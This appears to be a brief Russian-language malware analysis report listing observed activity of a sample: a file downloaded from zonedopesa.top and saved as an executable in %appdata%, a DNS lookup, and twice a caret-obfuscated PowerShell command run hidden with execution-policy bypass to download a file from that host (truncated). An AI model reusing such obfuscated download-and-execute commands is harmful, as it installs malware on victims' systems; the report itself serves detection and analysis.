Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWErs^H^e^LL^.EX^E -eXEcUtIO^Np^OlicY^ ByPass -nO^Pr^OfIl^E^ ^-^w^IND^o^wstYLE ^HidD^eN (^NEW-Obj^eC^t^ ^s^YStEm.^net.web^cliE^Nt^).dO^WNL^oAd^FIle(^'http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "P^oWErs^H^e^LL^.EX^E -eXEcUtIO^Np^OlicY^ ByPass -nO^Pr^OfIl^E^ ^-^w^IND^o^wstYLE ^HidD^eN (^NEW-Obj^eC^t^ ^s^YStEm.^net.web^cliE^Nt^).dO^WNL^oAd^FIle(^'http://www.zonedopesa...' (со скрытым окном)